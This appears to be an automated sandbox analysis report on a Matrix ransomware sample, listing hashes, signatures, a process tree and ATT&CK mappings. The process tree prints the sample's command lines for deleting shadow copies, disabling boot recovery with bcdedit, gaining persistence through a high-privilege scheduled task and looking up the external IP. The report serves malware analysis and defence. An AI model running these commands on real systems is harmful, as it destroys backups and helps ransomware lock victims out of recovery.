Analysis
max time kernel: 151s
max time network: 46s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 03-11-2022 12:57
Static task
static1
Behavioral task
behavioral1
Sample
907636b28d162f7110b067a8178fa38c.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
907636b28d162f7110b067a8178fa38c.exe
Resource
win10v2004-20220901-en
General
Target: 907636b28d162f7110b067a8178fa38c.exe
Size: 1.2MB
MD5: 907636b28d162f7110b067a8178fa38c
SHA1: 048ae4691fe267e7c8d9eda5361663593747142a
SHA256: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512: 501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
SSDEEP: 24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid | Process
1224 | bcdedit.exe
1764 | bcdedit.exe
-
Blocklisted process makes network request 1 IoCs
flow | pid | Process
8 | 752 | powershell.exe
-
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\system32\Drivers\PROCEXP152.SYS | iOwlD4KZ64.exe
-
Executes dropped EXE 3 IoCs
pid | Process
1940 | NWYHhHYv.exe
1620 | iOwlD4KZ.exe
1460 | iOwlD4KZ64.exe
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File opened for modification | C:\Users\Admin\Pictures\GrantRequest.tiff | 907636b28d162f7110b067a8178fa38c.exe
-
Sets service image path in registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" | iOwlD4KZ64.exe
-
resource | yara_rule
behavioral1/files/0x0006000000014baa-88.dat | upx
behavioral1/files/0x0006000000014baa-87.dat | upx
behavioral1/files/0x0006000000014baa-90.dat | upx
behavioral1/memory/1620-92-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral1/memory/1620-98-0x0000000000400000-0x0000000000477000-memory.dmp | upx
-
Loads dropped DLL 4 IoCs
pid | Process
1824 | 907636b28d162f7110b067a8178fa38c.exe
1824 | 907636b28d162f7110b067a8178fa38c.exe
1912 | cmd.exe
1620 | iOwlD4KZ.exe
-
Modifies file permissions 1 TTPs 1 IoCs
pid | Process
1252 | takeown.exe
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
7 | myexternalip.com
-
Drops file in System32 directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\rNwjBuHZ.bmp" | reg.exe
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1564 | schtasks.exe
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1520 | vssadmin.exe
1144 | vssadmin.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid | Process
752 | powershell.exe
1460 | iOwlD4KZ64.exe
1460 | iOwlD4KZ64.exe
1460 | iOwlD4KZ64.exe
1956 | powershell.exe
1956 | powershell.exe
1956 | powershell.exe
-
Suspicious behavior: LoadsDriver 1 IoCs
pid | Process
1460 | iOwlD4KZ64.exe
-
Suspicious use of AdjustPrivilegeToken 47 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid | Process
1660 | attrib.exe
Processes
C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe (PID 1824)
Command line: "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe"
  - Matrix Ransomware
  - Modifies extensions of user files
  - Loads dropped DLL
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (PID 1984)
  Command line: "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe" "C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe"

  C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe (PID 1940)
  Command line: "C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe" -n
    - Executes dropped EXE

  C:\Windows\SysWOW64\cmd.exe (PID 436)
  Command line: "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\adUQEWSg.txt"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 752)
    Command line: powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 1112)
  Command line: "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rNwjBuHZ.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\reg.exe (PID 2032)
    Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rNwjBuHZ.bmp" /f
      - Sets desktop wallpaper using registry

    C:\Windows\SysWOW64\reg.exe (PID 1148)
    Command line: reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f

    C:\Windows\SysWOW64\reg.exe (PID 1712)
    Command line: reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      - Matrix Ransomware

  C:\Windows\SysWOW64\cmd.exe (PID 1672)
  Command line: "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\wscript.exe (PID 940)
    Command line: wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs"
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe (PID 1312)
      Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wADvx861.bat" /sc minute /mo 5 /RL HIGHEST /F
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\schtasks.exe (PID 1564)
        Command line: schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wADvx861.bat" /sc minute /mo 5 /RL HIGHEST /F
          - Creates scheduled task(s)

      C:\Windows\SysWOW64\cmd.exe (PID 628)
      Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\schtasks.exe (PID 1988)
        Command line: schtasks /Run /I /tn DSHCA

  C:\Windows\SysWOW64\cmd.exe (PID 1308)
  Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\ghxOWIYe.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\attrib.exe (PID 1660)
    Command line: attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
      - Views/modifies file attributes

    C:\Windows\SysWOW64\cacls.exe (PID 2032)
    Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe (PID 1252)
    Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
      - Modifies file permissions

    C:\Windows\SysWOW64\cmd.exe (PID 1912)
    Command line: C:\Windows\system32\cmd.exe /c iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe (PID 1620)
      Command line: iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
        - Executes dropped EXE
        - Loads dropped DLL

        C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ64.exe (PID 1460)
        Command line: iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Sets service image path in registry
          - Enumerates connected drives
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: LoadsDriver
          - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\taskeng.exe (PID 1976)
Command line: taskeng.exe {DCE71A13-7F60-41A9-8408-5C9D9CA2DA5D} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory

  C:\Windows\SYSTEM32\cmd.exe (PID 1648)
  Command line: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wADvx861.bat"

    C:\Windows\system32\vssadmin.exe (PID 1520)
    Command line: vssadmin Delete Shadows /All /Quiet
      - Interacts with shadow copies

    C:\Windows\System32\Wbem\WMIC.exe (PID 1904)
    Command line: wmic SHADOWCOPY DELETE
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1956)
    Command line: powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\vssadmin.exe (PID 1144)
      Command line: "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
        - Interacts with shadow copies

    C:\Windows\system32\bcdedit.exe (PID 1224)
    Command line: bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit

    C:\Windows\system32\bcdedit.exe (PID 1764)
    Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit

    C:\Windows\system32\schtasks.exe (PID 1548)
    Command line: SCHTASKS /Delete /TN DSHCA /F

C:\Windows\system32\vssvc.exe (PID 964)
Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Persistence
- Hidden Files and Directories: 1
- Registry Run Keys / Startup Folder: 1
- Scheduled Task: 1
Defense Evasion
- File Deletion: 2
- File and Directory Permissions Modification: 1
- Hidden Files and Directories: 1
- Modify Registry: 2
Downloads